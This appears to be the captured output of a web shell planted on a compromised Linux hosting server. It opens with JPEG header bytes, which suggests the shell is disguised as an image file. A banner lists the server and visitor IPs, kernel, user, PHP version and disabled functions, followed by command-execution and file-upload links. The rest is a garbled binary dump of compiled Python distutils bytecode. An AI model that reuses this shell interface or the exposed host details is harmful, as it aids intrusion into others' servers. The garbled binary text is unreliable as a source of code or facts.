����JFIF��x�x������Exif��MM�*���� ����E���J����������������(������������������
Server IP : 103.191.208.227 / Your IP : 3.15.232.244 Web Server : LiteSpeed System : Linux emphasis.herosite.pro 4.18.0-553.34.1.lve.el8.x86_64 #1 SMP Thu Jan 9 16:30:32 UTC 2025 x86_64 User : mhmsfzcs ( 1485) PHP Version : 8.1.31 Disable Function : show_source, system, shell_exec, passthru, exec MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/../lib64/gio/../python3.8/asyncio/../distutils/__pycache__/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
U e5d� � @ s� d Z ddlZddlZddlmZmZ ddlmZ ddlm Z ddd�Z d d � Zddd�Zej d krjdadaddd�Zddd�ZdS )z�distutils.spawn Provides the 'spawn()' function, a front-end to various platform- specific functions for launching another program in a sub-process. Also provides the 'find_executable()' to search the path for a given executable name. � N)�DistutilsPlatformError�DistutilsExecError)�DEBUG)�log� c C sN t | �} tjdkr"t| ||d� n(tjdkr<t| ||d� ntdtj ��dS )a� Run another program, specified as a command list 'cmd', in a new process. 'cmd' is just the argument list for the new process, ie. cmd[0] is the program to run and cmd[1:] are the rest of its arguments. There is no way to run a program with a name different from that of its executable. If 'search_path' is true (the default), the system's executable search path will be used to find the program; otherwise, cmd[0] must be the exact path to the executable. If 'dry_run' is true, the command will not actually be run. Raise DistutilsExecError if running the program fails in any way; just return on success. �posix)�dry_run�ntz1don't know how to spawn programs on platform '%s'N)�list�os�name�_spawn_posix� _spawn_ntr )�cmd�search_path�verboser � r �'/usr/lib64/python3.8/distutils/spawn.py�spawn s �r c C s* t | �D ]\}}d|krd| | |<